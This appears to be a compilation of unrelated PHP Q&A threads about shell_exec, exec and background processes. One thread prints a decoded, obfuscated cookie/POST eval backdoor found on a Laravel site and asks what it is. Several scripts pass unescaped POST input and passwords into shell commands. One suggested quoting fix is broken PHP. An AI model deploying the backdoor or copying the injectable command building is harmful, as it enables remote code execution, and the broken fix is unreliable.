I am successfully starting and running concurrent PHP-Processes with:
$WshShell = new COM('WScript.Shell');
foreach (array('foo', 'bar', ...) as $i) {
    $oExec = $WshShell->Run(
        'C:\\wamp\\bin\\php\\php' . phpversion() . '\\php.exe ' .
        '-c C:\\wamp\\bin\\apache\\Apache2.2.21\\bin ' . // use the correct php.ini!
        '-f C:\\Users\\Max\\Project\\start.php "' . $i . '" ' . 0,
        false // intWindowStyle = 0 (hidden); bWaitOnReturn defaults to false, so PHP does not block
    );
}
I am wondering: how many PHP processes can I run at the same time (in a typical Windows or Linux environment)?
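There is no hard PHP-level cap; the practical limit is the machine's memory and CPU, so it is usually better to throttle the spawner yourself. Below is a minimal, portable sketch of that idea (my own illustration, not from the post above; the pool size of 8 and the shortened command are arbitrary placeholders), using proc_open() so it works the same on Windows and Linux:
// Throttled launcher sketch: never more than $maxConcurrent child
// processes alive at once.
$tasks = array('foo', 'bar', 'baz');
$maxConcurrent = 8; // tune to your core count / available memory
$running = array();
foreach ($tasks as $i) {
    // Wait while the pool is full, reaping finished children.
    while (count($running) >= $maxConcurrent) {
        foreach ($running as $k => $proc) {
            $status = proc_get_status($proc);
            if (!$status['running']) {
                proc_close($proc);
                unset($running[$k]);
            }
        }
        usleep(100000); // poll every 100 ms
    }
    $pipes = array();
    $running[] = proc_open('php -f start.php ' . escapeshellarg($i), array(), $pipes);
}
// Drain the remaining processes.
foreach ($running as $proc) {
    do {
        $status = proc_get_status($proc);
        usleep(100000);
    } while ($status['running']);
    proc_close($proc);
}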
I am working on a database migration. I have written code that executes a command to retrieve data from the database and push it into a CSV file. This works fine with MySQL, but when I try to do the same with SQL Server it does not work; in fact, when I copy and paste the same command into a command prompt, it runs fine. I have double-checked everything and do not understand why it is not working. It returns blank output. I have already tried many of the solutions suggested before; none works. Any help on this is most appreciated.
Here is the code I am using:
// $sqlsrv is used to determine the database server type
$str_query = voc_get_query_string($query);
$output_uri = 'temporary://' . user_password();
$file_path = drupal_realpath($output_uri . '.csv');
if ($sqlsrv) {
    $exec_path = drupal_realpath('private://Binn\sqlcmd');
} else {
    $exec_path = drupal_realpath('private://mysql');
}
$sql_uri = 'temporary://' . user_password();
$sql_path = drupal_realpath($sql_uri);
$fp = fopen($sql_path, 'w');
fwrite($fp, $str_query);
fclose($fp);
global $databases;
if ($sqlsrv) {
    $cmd = $exec_path .
        ' -S ' . $databases['default']['default']['host'] .
        ' -d ' . $databases['default']['default']['database'] .
        ' -U ' . $databases['default']['default']['username'] .
        ' -P ' . $databases['default']['default']['password'] .
        ' -i ' . $sql_path . ' >> ' . $file_path .
        ' -s "," -W -m10 -r1';
}
else {
    $cmd = $exec_path .
        ' ' . $databases['default']['default']['database'] .
        ' -h ' . $databases['default']['default']['host'] .
        ' -u ' . $databases['default']['default']['username'] .
        ' -p ' . $databases['default']['default']['password'] .
        ' < ' . $sql_path .
        ' > ' . $file_path;
}
exec($cmd);
watchdog('cmd', var_export($cmd, TRUE));
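One thing worth adding while debugging (my suggestion, not part of the original code): exec() silently discards both stderr and the exit code, so a failing sqlcmd simply looks like "blank output". A small sketch that makes the failure visible:
// Debugging sketch: merge stderr into stdout and log the exit code, so a
// sqlcmd/mysql failure shows up in the log instead of an empty CSV file.
$out = array();
$ret = 0;
exec($cmd . ' 2>&1', $out, $ret);
watchdog('cmd', 'exit code @ret, output: @out', array(
    '@ret' => $ret,
    '@out' => implode("\n", $out),
));
A common culprit in this setup is that the web-server user runs with a different PATH and different permissions than your interactive command prompt, which is exactly the kind of error this captures.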
For a customer I am maintaining a small group of websites built in PHP (Laravel). Lately, while working on these, I have discovered a couple of new, suspicious-looking files that suddenly appeared on two of the websites' FTP servers. The files are not part of the original codebase, and I have no idea where they came from. There are three files in total, named b3lo5x3x.php, cache.php and plugin.php, and they are located in the root directory of the websites.
The content of the files looks pretty disturbing. When decoded on unphp.net I get the following result, which is exactly the same for all three files. All three files are also the same size.
<?php
$hguenpg = '8v7n\'kadeH62ycg_ti9pm1-fsb0#rxlu4*o';
$fvgiv = Array();
$fvgiv[] = $hguenpg[18] . $hguenpg[11] . $hguenpg[0] . $hguenpg[0] . $hguenpg[26] . $hguenpg[11] . $hguenpg[21] . $hguenpg[0] . $hguenpg[22] . $hguenpg[10] . $hguenpg[7] . $hguenpg[13] . $hguenpg[11] . $hguenpg[22] . $hguenpg[32] . $hguenpg[6] . $hguenpg[23] . $hguenpg[8] . $hguenpg[22] . $hguenpg[0] . $hguenpg[32] . $hguenpg[6] . $hguenpg[25] . $hguenpg[22] . $hguenpg[13] . $hguenpg[32] . $hguenpg[7] . $hguenpg[21] . $hguenpg[18] . $hguenpg[11] . $hguenpg[25] . $hguenpg[2] . $hguenpg[7] . $hguenpg[0] . $hguenpg[23] . $hguenpg[2];
$fvgiv[] = $hguenpg[9] . $hguenpg[33];
$fvgiv[] = $hguenpg[27];
$fvgiv[] = $hguenpg[13] . $hguenpg[34] . $hguenpg[31] . $hguenpg[3] . $hguenpg[16];
$fvgiv[] = $hguenpg[24] . $hguenpg[16] . $hguenpg[28] . $hguenpg[15] . $hguenpg[28] . $hguenpg[8] . $hguenpg[19] . $hguenpg[8] . $hguenpg[6] . $hguenpg[16];
$fvgiv[] = $hguenpg[8] . $hguenpg[29] . $hguenpg[19] . $hguenpg[30] . $hguenpg[34] . $hguenpg[7] . $hguenpg[8];
$fvgiv[] = $hguenpg[24] . $hguenpg[31] . $hguenpg[25] . $hguenpg[24] . $hguenpg[16] . $hguenpg[28];
$fvgiv[] = $hguenpg[6] . $hguenpg[28] . $hguenpg[28] . $hguenpg[6] . $hguenpg[12] . $hguenpg[15] . $hguenpg[20] . $hguenpg[8] . $hguenpg[28] . $hguenpg[14] . $hguenpg[8];
$fvgiv[] = $hguenpg[24] . $hguenpg[16] . $hguenpg[28] . $hguenpg[30] . $hguenpg[8] . $hguenpg[3];
$fvgiv[] = $hguenpg[19] . $hguenpg[6] . $hguenpg[13] . $hguenpg[5];
foreach ($fvgiv[7]($_COOKIE, $_POST) as $lfpfzw => $wqudv) {
    function dgubnv($fvgiv, $lfpfzw, $nclll) {
        return $fvgiv[6]($fvgiv[4]($lfpfzw . $fvgiv[0], ($nclll / $fvgiv[8]($lfpfzw)) + 1), 0, $nclll);
    }
    function oocfo($fvgiv, $elasr) {
        return @$fvgiv[9]($fvgiv[1], $elasr);
    }
    function yiugt($fvgiv, $elasr) {
        $vezpr = $fvgiv[3]($elasr) % 3;
        if (!$vezpr) {
            eval($elasr[1]($elasr[2]));
            exit();
        }
    }
    $wqudv = oocfo($fvgiv, $wqudv);
    yiugt($fvgiv, $fvgiv[5]($fvgiv[2], $wqudv ^ dgubnv($fvgiv, $lfpfzw, $fvgiv[8]($wqudv))));
} ?>
Does anyone know what this can be? Can it be that the FTP servers are infected with some kind of malware or hacking tools?
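For reference, the obfuscation is only an index map into the $hguenpg string, so it can be decoded offline without ever executing it. A small sketch (mine, not from the post) that prints what each array entry resolves to:
// Safe offline decoder: rebuild the lookup strings exactly as the file
// does, but print them instead of calling them. Nothing is eval'd here.
$hguenpg = '8v7n\'kadeH62ycg_ti9pm1-fsb0#rxlu4*o';
$fvgiv = array();
// ... paste the $fvgiv[] = ... lines from the sample above here ...
foreach ($fvgiv as $i => $s) {
    echo '$fvgiv[' . $i . '] => ' . $s . "\n";
}
Run against the sample, the entries resolve to a hard-coded key (92880218-6dc2-4afe-84ab-c4d192b7d8f7) plus the function names array_merge, pack (with the 'H*' hex format), explode (on '#'), substr, str_repeat, strlen and count. So the loop merges $_COOKIE and $_POST, hex-decodes each value, XORs it against its own parameter name padded out with the key, splits the result on '#' and, when the piece count is a multiple of 3, eval()s a transformed piece. In other words, it is a generic remote-code-execution backdoor triggered by a crafted cookie or POST field.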
Wipe the affected machines completely and reinstall the Laravel project(s) on a new, clean machine. You should also audit them, and any other software used, if possible.
Make sure that all of the software on the server is kept up to date, too. Most likely you were compromised through outdated software with a known vulnerability.
Here is a sample of my script:
$clientid   = $_POST['clientid'];
$from_day   = $_POST['stat_from_day'];
$from_month = $_POST['stat_from_month'];
$from_year  = $_POST['stat_from_year'];
$to_day     = $_POST['stat_to_day'];
$to_month   = $_POST['stat_to_month'];
$to_year    = $_POST['stat_to_year'];
$from_date_string = $from_day . ' ' . $from_month . ' ' . $from_year;
$to_date_string   = $to_day . ' ' . $to_month . ' ' . $to_year;
$baseurl = "http://www.test.com/";
$part1 = "?Search=" . $clientid . "&from_day=" . $from_day . "&from_month=" . $from_month . "&from_year=" . $from_year;
$part2 = "&to_day=" . $to_day . "&to_month=" . $to_month . "&to_year=" . $to_year;
$time = time();
$formatted_time = date("d_M_Y", $time);
$command = "xvfb-run -a /usr/bin/wkhtmltopdf --ignore-load-errors";
$url = $baseurl . $part1 . $part2;
$html = file_get_contents($url);
$output_dir = '/var/www/stats/pdf/';
$output = $clientid . '_Search_Export_' . $formatted_time . rand(10000, 99999) . '.pdf';
$generate = shell_exec($command . ' ' . $url . ' ' . $output_dir . $output);
The problem I seem to be having is with $command: wkhtmltopdf is run via the command line, and the &variable= part causes the script to error, because on the command line & starts another command. My question is: how do I pass the variables correctly, so that the script the URL points to can still read the $_GET variables it needs to work?
I have done a bit of looking around and found something along the lines of using $argv[1]:
Replacing $_GET to make it work from command line
However, I cannot seem to find a reference that closely matches my needs.
Change this:
$url = $baseurl . $part1 . $part2 ;
To this:
$url = "\" . $baseurl . $part1 . $part2 . "\";
Actually, wkhtmltopdf accepts POST data and passes it to the server-side page being printed/exported to PDF.
All you need is --post fieldName value:
xvfb-run -a /usr/bin/wkhtmltopdf --ignore-load-errors --post username blablabla --post bla2 answer2
You can repeat --post in the command to pass as many POST parameters as you want.
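Applied to the script above, it could look like this (a sketch: --post is a real wkhtmltopdf option, but the loop and field names are my adaptation of the question's variables). No & ever reaches the shell, and the target page reads $_POST instead of $_GET:
// Build one "--post name value" pair per parameter instead of a query string.
$fields = array(
    'Search'     => $clientid,
    'from_day'   => $from_day,
    'from_month' => $from_month,
    'from_year'  => $from_year,
    'to_day'     => $to_day,
    'to_month'   => $to_month,
    'to_year'    => $to_year,
);
$post_args = '';
foreach ($fields as $name => $value) {
    $post_args .= ' --post ' . escapeshellarg($name) . ' ' . escapeshellarg($value);
}
$generate = shell_exec($command . $post_args . ' ' . escapeshellarg($baseurl)
    . ' ' . escapeshellarg($output_dir . $output));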
I'm experiencing a very strange problem with my PHP script "hanging" even after the background processes have finished running. I am running PHP 5.3 on Windows Server 2008 R2, under IIS7 with Apache Tomcat installed.
Project background: my script generates PDF forms through shell_exec(). Anywhere between 1 and 3,000 forms can be generated. Once all forms have been generated, a download link and a "start over" link are supposed to show at the bottom of the page; instead, the site continues to "load" and the links never show up, even when I check the server and see that all files have finished generating.
This issue only comes up when generating 300+ forms, which takes 3-6 minutes.
I have set php.ini's max_execution_time to 1200 (20 minutes), and IIS7's "Connection Timeout" is also set to 1200 seconds. Here are links to screenshots confirming that these settings are in place:
http://i49.tinypic.com/15gavew.png -- php.ini
http://i49.tinypic.com/9u5j0n.png -- IIS7
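(For reference, the same limits can also be raised per request from PHP itself; a minimal sketch, reusing the 1200-second value above:)
// Per-request equivalents of the php.ini setting; harmless to call even
// when php.ini already allows 1200 seconds.
set_time_limit(1200);                 // resets the execution-time counter
ini_set('max_execution_time', 1200);
ignore_user_abort(true);              // keep running if the client disconnects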
Is there another setting that I am missing? Is there an Apache Tomcat connection-timeout setting that I am unaware of? Does PHP have another timeout setting besides max_execution_time and set_time_limit()? I've exhausted my resources and haven't a clue why my script continues to hang, even after the while loop has finished running and all PDFs have been successfully created.
Thank you for any and all help/advice.
While Loop Code
/* build zip & directory for PDFs */
$zip = new ZipArchive;
$time = microtime(true);
$new_dir = "c:/pdfgenerator/f-$time";
if(!file_exists($new_dir)) {
mkdir($new_dir);
}
$res = $zip->open("pdf/tmppdf/mf-pdfs_" . $time . ".zip", ZipArchive::CREATE);
$num = 0;
while($row = mysql_fetch_array($result)) {
/* associate a random # assigned to each PDF file name */
$num++;
include($form);
$rand = rand(1,50000);
$file_num = $num * $rand;
$fo = fopen('c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.html', 'w') or die("can't open file");
fwrite($fo, $output);
echo shell_exec('c:\wkhtmltopdf\wkhtmltoimage c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.html c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.jpeg');
/* the follow uses ghost script to execute the ImageMagick convert command from cmd.exe */
$magick_dir = 'C:\imagemagick'; // install IM in short DOS 8.3 compatible path
$send_cmd=$magick_dir .'\convert c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.jpeg -resize "1710x2200^!" c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.jpeg' ;
echo shell_exec($send_cmd);
$send_cmd=$magick_dir .'\convert c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.jpeg c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.pdf';
echo shell_exec($send_cmd);
/* EO ghostscript code */
/* add the newly generated files to the Zip Archive */
if ($res === TRUE) {
//echo "RESULT TRUE...";
$zip->addFile('c:/pdfgenerator/f-' . $time . '/mf_pdf-' . $time . '-' . $file_num . '.pdf','c:/pdfgenerator/f-' . $time . '/mf_pdf-' . $time . '-' . $file_num . '.pdf');
//echo "FILE ADDED!";
}
}
echo "<h2>Download Zip</h2>";
echo "<h2>Start Over</h2>";
$zip->close("pdf/tmppdf/mf-pdfs_" . $time . ".zip", ZipArchive::close());
}
}
Specific Shell Lines
echo shell_exec('c:\wkhtmltopdf\wkhtmltoimage c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.html c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.jpeg');
/* the following runs ImageMagick's convert command via cmd.exe */
$magick_dir = 'C:\imagemagick'; // install IM in a short DOS 8.3 compatible path
$send_cmd = $magick_dir . '\convert c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.jpeg -resize "1710x2200^!" c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.jpeg';
echo shell_exec($send_cmd);
$send_cmd = $magick_dir . '\convert c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.jpeg c:\\pdfgenerator\\f-' . $time . '\\mf_pdf-' . $time . '-' . $file_num . '.pdf';
echo shell_exec($send_cmd);
Update: I have since converted all of my mysql_ functions, which are deprecated as of PHP 5.5, to their MySQLi equivalents.
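One suggestion worth trying (my addition, not from the thread): the symptom — all files finish but the page keeps "loading" — can also come from buffered output on a long-running request, so push some output through to IIS inside the while loop:
// Inside the while loop, after each form is generated. The 4 KB pad is an
// assumption: many IIS/FastCGI setups buffer roughly that much before
// sending anything to the client.
echo str_pad("Generated form $num", 4096) . "<br/>\n";
if (ob_get_level() > 0) {
    ob_flush(); // flush PHP's own output buffer first
}
flush(); // then hand the bytes to the web server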
I'm using a local Linux computer and need to back up/mirror some very large file structures regularly. I only have access over SFTP.
I was after a simple one-click solution. I originally tried to write the little script in Bash, but I've never used it before and am not up to scratch with the syntax, so I resorted to PHP. (I do understand PHP is not designed for this kind of work, but I'm on a tight timescale and don't have the time to get into Bash at the moment.)
<?php
//init
parse_str(implode('&', array_slice($argv, 1)), $_GET);
$error = array();
$lPrefix = '/home/hozza/Sites/';
$archiveLocation = '/home/hozza/Backups/';
$lDir = isset($_GET['l']) ? $_GET['l'] : $error[] = 'Local Directory Required';
$rDir = isset($_GET['r']) ? $_GET['r'] : $error[] = 'Remote Directory Required';
$bookmark = isset($_GET['b']) ? $_GET['b'] : $error[] = 'lftp Bookmark Required';
//Check for args
if(count($error) == 0) {
$archiveName = end(explode('/', $lDir)) . '_' . date('Y-m-d_H-i');
//Validate local dir
if(is_dir($lPrefix . $lDir)) {
//preserve Sublime Text 2 config SFTP files
$ST2_SFTP_conf = false;
if(file_exists($lPrefix . $lDir . '/sftp-config.json')) {
$ST2_SFTP_conf = file_get_contents($lPrefix . $lDir . '/sftp-config.json');
unlink($lPrefix . $lDir . '/sftp-config.json');
}
//Start mirror
$lftOutput = explode("\n", shell_exec('lftp -e "mirror -e -p --parallel=10 --log=' . $archiveLocation . 'logs/' . $archiveName . '.txt ' . $rDir . '/ ' . $lPrefix . $lDir . '/; exit top" ' . $bookmark));
//Tar regardless of lftp error or success
$tarOutput = shell_exec('cd ' . $lPrefix . ' && tar -czf ' . $archiveLocation . $archiveName . '.tar.gz ' . $lDir);
//Output completion or errors
shell_exec('notify-send -i gnome-network-properties -t 0 "Mirror & Archive Complete" "' . $archiveName . '\n\n' . implode('\n', $lftOutput) . $tarOutput . '"');
//put back ST2 SFTP conf
if($ST2_SFTP_conf != false) file_put_contents($lPrefix . $lDir . '/sftp-config.json', $ST2_SFTP_conf);
exit;
}
else shell_exec('notify-send -i error -t 0 "Mirror & Archive Error" "' . date('Y-m-d') . ' ' . date('H-i') . '\n' . $lDir . ' \n Does not exist! D:"');
}
else shell_exec('notify-send -i error -t 0 "Mirror & Archive Error" "' . date('Y-m-d') . ' ' . date('H-i') . '\n' . implode('\n', $error) . '"');
?>
It can be run for many sites via a shortcut like so:
terminator -T "Mirror & Archive" -e "php ~/Programs/mirror.php l=local-dir_path r=./ b=lftp-bookmark-name"
If no password is stored in the lftp bookmark (there shouldn't be, as it's stored in plain text), the terminal prompts for one. After the script has run, a nice notification is shown with some info about files/folders/speed, etc.
However, while the script is running in a terminal, only the password prompt is shown. I would like all of the output displayed in the terminal (normally lftp would show which file/folder it is currently working on, etc.).
Anyone know how to do that?
IIRC, the reason you see the password prompt in the terminal is that it is written to stderr. You could try redirecting stdout to stderr for your commands, which should show you the 'real-time' progress. Tack this onto the end of the shell_exec() command: 1>&2
i.e.:
shell_exec('lftp -e "mirror -e -p --parallel=10 --log=' . $archiveLocation . 'logs/' . $archiveName . '.txt ' . $rDir . '/ ' . $lPrefix . $lDir . '/; exit top" ' . $bookmark . ' 1>&2')
However, this will preclude you from having anything returned by shell_exec() for logging purposes. What I would suggest is something like:
$log_stem = '/tmp/' . time() . '_'; // e.g.: /tmp/1357581737_
$lfOutfile = $log_stem . 'lftp.log';
$tarOutfile = $log_stem . 'tar.log';
shell_exec('lftp -blah | tee ' . $lfOutfile . ' 1>&2');
shell_exec('tar -blah | tee ' . $tarOutfile . ' 1>&2');
$lfOut = file_get_contents($lfOutfile);
$tarOut = file_get_contents($tarOutfile);
// remove tmp files
unlink($lfOutfile);
unlink($tarOutfile);
This will capture a copy of the output to a file before redirecting it to stderr, so you can watch it live.
However, if you want to run this via cron, I would recommend against writing anything that is not an error to stderr; otherwise cron will send a warning email every time the job runs.
I think the last answer was close:
Either this:
shell_exec('lftp -blah |& tee ' . $lfOutfile );
shell_exec('tar -blah |& tee ' . $tarOutfile );
Or, if that still doesn't work, try this:
shell_exec('lftp -blah 2>&1 | tee ' . $lfOutfile );
shell_exec('tar -blah 2>&1 | tee ' . $tarOutfile );